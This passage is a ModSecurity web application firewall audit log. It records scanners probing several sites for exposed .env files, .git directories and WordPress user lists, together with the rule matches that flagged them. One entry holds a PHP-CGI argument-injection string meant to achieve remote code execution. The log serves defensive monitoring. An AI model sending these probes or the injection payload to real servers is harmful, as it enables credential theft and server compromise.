Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0fe50d2f-Z-- --6094b971-A-- [24/Jul/2025:00:20:13.838387 +0300] aIFSDUdutIOpb_kg22h7hwAAAAo 185.177.72.9 35420 127.0.0.1 7081 --6094b971-B-- GET /main/.env HTTP/1.0 Host: webmail.itilebanon.com X-Real-IP: 185.177.72.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6094b971-F-- HTTP/1.1 404 Not Found Content-Length: 269 Connection: close Content-Type: text/html; charset=iso-8859-1 --6094b971-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "webmail.itilebanon.com"] [uri "/main/.env"] [unique_id "aIFSDUdutIOpb_kg22h7hwAAAAo"] Stopwatch: 1753305613833082 5356 (- - -) Stopwatch2: 1753305613833082 5356; combined=3428, p1=630, p2=2619, p3=24, p4=32, p5=122, sr=171, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6094b971-Z-- --6595e66b-A-- [24/Jul/2025:00:20:13.926754 +0300] aIFSDVooLYw4or2LgWJ5PAAAANA 185.177.72.9 35424 127.0.0.1 7081 --6595e66b-B-- GET /.env.old HTTP/1.0 Host: webmail.itilebanon.com X-Real-IP: 185.177.72.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6595e66b-F-- HTTP/1.1 404 Not Found Content-Length: 269 Connection: close Content-Type: text/html; charset=iso-8859-1 --6595e66b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||webmail.itilebanon.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "webmail.itilebanon.com"] [uri "/.env.old"] [unique_id "aIFSDVooLYw4or2LgWJ5PAAAANA"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||webmail.itilebanon.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "webmail.itilebanon.com"] [uri "/.env.old"] [unique_id "aIFSDVooLYw4or2LgWJ5PAAAANA"] Stopwatch: 1753305613921472 5348 (- - -) Stopwatch2: 1753305613921472 5348; combined=3413, p1=700, p2=2501, p3=25, p4=40, p5=146, sr=209, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6595e66b-Z-- --ae85ff01-A-- [24/Jul/2025:01:30:29.738633 +0300] aIFihVooLYw4or2LgWLPrwAAAME 194.126.202.234 35454 127.0.0.1 7080 --ae85ff01-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 41.128.143.86 X-Real-IP: 194.126.202.234 Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --ae85ff01-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae85ff01-E-- --ae85ff01-H-- Message: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/etc/apache2/modsecurity.d/rules/comodo_free/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||41.128.143.86|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input. [file "/etc/apache2/modsecurity.d/rules/comodo_free/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||41.128.143.86|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\\\\x5cxadd allow_url_include=1 \\\\x5cxadd auto_prepend_file=php://input: \\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] [hostname "41.128.143.86"] [uri "/hello.world"] [unique_id "aIFihVooLYw4or2LgWLPrwAAAME"] Stopwatch: 1753309829732767 5975 (- - -) Stopwatch2: 1753309829732767 5975; combined=4033, p1=761, p2=3007, p3=50, p4=41, p5=173, sr=322, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ae85ff01-Z-- --3e29c837-A-- [24/Jul/2025:01:48:52.330899 +0300] aIFm1FooLYw4or2LgWLuOgAAAMU 78.153.140.222 49944 127.0.0.1 7081 --3e29c837-B-- GET /.env HTTP/1.0 Host: alc.edu.lb X-Forwarded-Http-Host: alc.edu.lb:443 X-Real-IP: 78.153.140.222 Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0 --3e29c837-F-- HTTP/1.1 301 Moved Permanently Location: https://www.alcsys.odoo.com/.env Content-Length: 301 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e29c837-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "alc.edu.lb"] [uri "/.env"] [unique_id "aIFm1FooLYw4or2LgWLuOgAAAMU"] Stopwatch: 1753310932329590 1402 (- - -) Stopwatch2: 1753310932329590 1402; combined=831, p1=680, p2=0, p3=34, p4=36, p5=81, sr=235, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3e29c837-Z-- --0bf00f7b-A-- [24/Jul/2025:01:48:52.388466 +0300] aIFm1EdutIOpb_kg22izoAAAABc 78.153.140.222 49984 127.0.0.1 7081 --0bf00f7b-B-- GET /.env HTTP/1.0 Host: www.alc.edu.lb X-Forwarded-Http-Host: www.alc.edu.lb:443 X-Real-IP: 78.153.140.222 Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Debian/8.0 Chrome/58.0.3029.110 Safari/537.36 OPR/45.0.2552.881 --0bf00f7b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.alcsys.odoo.com/.env Content-Length: 305 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bf00f7b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.alc.edu.lb"] [uri "/.env"] [unique_id "aIFm1EdutIOpb_kg22izoAAAABc"] Stopwatch: 1753310932386872 1727 (- - -) Stopwatch2: 1753310932386872 1727; combined=908, p1=709, p2=0, p3=56, p4=45, p5=98, sr=192, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0bf00f7b-Z-- --92442e5e-A-- [24/Jul/2025:01:49:03.289585 +0300] aIFm30dutIOpb_kg22izzQAAAAU 78.153.140.222 42022 127.0.0.1 7081 --92442e5e-B-- GET /api/.env HTTP/1.0 Host: www.alc.edu.lb X-Forwarded-Http-Host: www.alc.edu.lb:443 X-Real-IP: 78.153.140.222 Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 --92442e5e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.alcsys.odoo.com/api/.env Content-Length: 309 Connection: close Content-Type: text/html; charset=iso-8859-1 --92442e5e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.alc.edu.lb"] [uri "/api/.env"] [unique_id "aIFm30dutIOpb_kg22izzQAAAAU"] Stopwatch: 1753310943288118 1540 (- - -) Stopwatch2: 1753310943288118 1540; combined=843, p1=652, p2=0, p3=39, p4=35, p5=116, sr=178, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --92442e5e-Z-- --fbafab78-A-- [24/Jul/2025:01:49:08.103334 +0300] aIFm5EdutIOpb_kg22iz0QAAAA0 78.153.140.222 42114 127.0.0.1 7081 --fbafab78-B-- GET /dev/.env HTTP/1.0 Host: www.alc.edu.lb X-Forwarded-Http-Host: www.alc.edu.lb:443 X-Real-IP: 78.153.140.222 Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36 --fbafab78-F-- HTTP/1.1 301 Moved Permanently Location: https://www.alcsys.odoo.com/dev/.env Content-Length: 309 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbafab78-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.alc.edu.lb"] [uri "/dev/.env"] [unique_id "aIFm5EdutIOpb_kg22iz0QAAAA0"] Stopwatch: 1753310948101933 1474 (- - -) Stopwatch2: 1753310948101933 1474; combined=874, p1=657, p2=0, p3=35, p4=33, p5=149, sr=205, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fbafab78-Z-- --d24e684d-A-- [24/Jul/2025:02:06:01.243545 +0300] aIFq2UdutIOpb_kg22jA4gAAABI 197.17.73.129 58524 127.0.0.1 7080 --d24e684d-B-- GET /.git/config HTTP/1.0 Host: 41.128.143.86 X-Real-IP: 197.17.73.129 Connection: close User-Agent: python-requests/2.28.1 Accept-Encoding: gzip, deflate Accept: */* --d24e684d-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --d24e684d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.86"] [uri "/.git/config"] [unique_id "aIFq2UdutIOpb_kg22jA4gAAABI"] Stopwatch: 1753311961238891 4728 (- - -) Stopwatch2: 1753311961238891 4728; combined=2888, p1=634, p2=2090, p3=23, p4=38, p5=102, sr=195, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d24e684d-Z-- --00ec9d4a-A-- [24/Jul/2025:02:06:01.388108 +0300] aIFq2UdutIOpb_kg22jA4wAAAAY 197.17.73.129 58538 127.0.0.1 7080 --00ec9d4a-B-- GET /script/.env HTTP/1.0 Host: 41.128.143.86 X-Real-IP: 197.17.73.129 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --00ec9d4a-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --00ec9d4a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.86"] [uri "/script/.env"] [unique_id "aIFq2UdutIOpb_kg22jA4wAAAAY"] Stopwatch: 1753311961381538 6675 (- - -) Stopwatch2: 1753311961381538 6675; combined=4201, p1=786, p2=3140, p3=36, p4=56, p5=183, sr=176, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --00ec9d4a-Z-- --689f9d32-A-- [24/Jul/2025:02:06:01.558335 +0300] aIFq2VooLYw4or2LgWIKFwAAANQ 197.17.73.129 58548 127.0.0.1 7080 --689f9d32-B-- POST /script/.env HTTP/1.0 Host: 41.128.143.86 X-Real-IP: 197.17.73.129 Connection: close Content-Length: 20 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* Content-Type: application/x-www-form-urlencoded --689f9d32-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --689f9d32-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.86"] [uri "/script/.env"] [unique_id "aIFq2VooLYw4or2LgWIKFwAAANQ"] Stopwatch: 1753311961547328 11085 (- - -) Stopwatch2: 1753311961547328 11085; combined=5583, p1=572, p2=4873, p3=34, p4=36, p5=68, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --689f9d32-Z-- --ad4ceb71-A-- [24/Jul/2025:02:06:01.775176 +0300] aIFq2UdutIOpb_kg22jA5AAAABg 197.17.73.129 58558 127.0.0.1 7080 --ad4ceb71-B-- GET /enviroments/.env.production HTTP/1.0 Host: 41.128.143.86 X-Real-IP: 197.17.73.129 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --ad4ceb71-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad4ceb71-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.86"] [uri "/enviroments/.env.production"] [unique_id "aIFq2UdutIOpb_kg22jA5AAAABg"] Stopwatch: 1753311961769543 5719 (- - -) Stopwatch2: 1753311961769543 5719; combined=3285, p1=685, p2=2396, p3=27, p4=110, p5=67, sr=171, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ad4ceb71-Z-- --a960237b-A-- [24/Jul/2025:02:06:01.927668 +0300] aIFq2VooLYw4or2LgWIKGAAAAMI 197.17.73.129 58564 127.0.0.1 7080 --a960237b-B-- POST /enviroments/.env.production HTTP/1.0 Host: 41.128.143.86 X-Real-IP: 197.17.73.129 Connection: close Content-Length: 20 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* Content-Type: application/x-www-form-urlencoded --a960237b-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --a960237b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.86"] [uri "/enviroments/.env.production"] [unique_id "aIFq2VooLYw4or2LgWIKGAAAAMI"] Stopwatch: 1753311961922069 5661 (- - -) Stopwatch2: 1753311961922069 5661; combined=3563, p1=1196, p2=2192, p3=41, p4=27, p5=107, sr=447, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a960237b-Z-- --9e335553-A-- [24/Jul/2025:02:06:02.083894 +0300] aIFq2kdutIOpb_kg22jA5QAAAAk 197.17.73.129 58576 127.0.0.1 7080 --9e335553-B-- GET /app/.env HTTP/1.0 Host: 41.128.143.86 X-Real-IP: 197.17.73.129 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --9e335553-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e335553-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.86"] [uri "/app/.env"] [unique_id "aIFq2kdutIOpb_kg22jA5QAAAAk"] Stopwatch: 1753311962077982 6096 (- - -) Stopwatch2: 1753311962077982 6096; combined=3744, p1=761, p2=2811, p3=32, p4=45, p5=94, sr=191, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9e335553-Z-- --f0144313-A-- [24/Jul/2025:02:09:19.690610 +0300] aIFrn0dutIOpb_kg22jECQAAAAg 156.253.172.68 46310 127.0.0.1 7081 --f0144313-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: jac.group X-Real-IP: 156.253.172.68 X-Accel-Internal: /internal-nginx-static-location Connection: close Referer: https://www.google.com User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept-Encoding: gzip,deflate --f0144313-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 24 May 2022 15:05:06 GMT ETag: "328-5dfc34833fcce" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --f0144313-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||jac.group|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||jac.group|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "jac.group"] [uri "/wp-json/wp/v2/users"] [unique_id "aIFrn0dutIOpb_kg22jECQAAAAg"] Stopwatch: 1753312159686187 4541 (- - -) Stopwatch2: 1753312159686187 4541; combined=2545, p1=570, p2=1879, p3=0, p4=0, p5=96, sr=158, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f0144313-Z-- --cf3c1c33-A-- [24/Jul/2025:02:09:22.747846 +0300] aIFrokdutIOpb_kg22jEFgAAAA0 156.253.172.68 46672 127.0.0.1 7081 --cf3c1c33-B-- POST /xmlrpc.php HTTP/1.0 Host: jac.group X-Real-IP: 156.253.172.68 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.27) Accept-Encoding: gzip,deflate --cf3c1c33-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --cf3c1c33-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||jac.group|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|jac.group|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||jac.group|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "jac.group"] [uri "/xmlrpc.php"] [unique_id "aIFrokdutIOpb_kg22jEFgAAAA0"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'Primary script unknown' Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|jac.group|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "jac.group"] [uri "/xmlrpc.php"] [unique_id "aIFrokdutIOpb_kg22jEFgAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jac.group/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753312162666804 81119 (- - -) Stopwatch2: 1753312162666804 81119; combined=3523, p1=725, p2=2183, p3=72, p4=60, p5=351, sr=174, sw=132, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cf3c1c33-Z-- --d2fa4162-A-- [24/Jul/2025:02:15:20.208311 +0300] aIFtCFooLYw4or2LgWIaJwAAAMA 36.70.233.212 59088 127.0.0.1 7081 --d2fa4162-B-- GET /.git/ HTTP/1.0 Host: vivacetrading.com X-Real-IP: 36.70.233.212 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) Accept-Encoding: gzip --d2fa4162-F-- HTTP/1.1 200 OK Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 586 Content-Type: text/html; charset=UTF-8 --d2fa4162-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "vivacetrading.com"] [uri "/.git/"] [unique_id "aIFtCFooLYw4or2LgWIaJwAAAMA"] Apache-Handler: 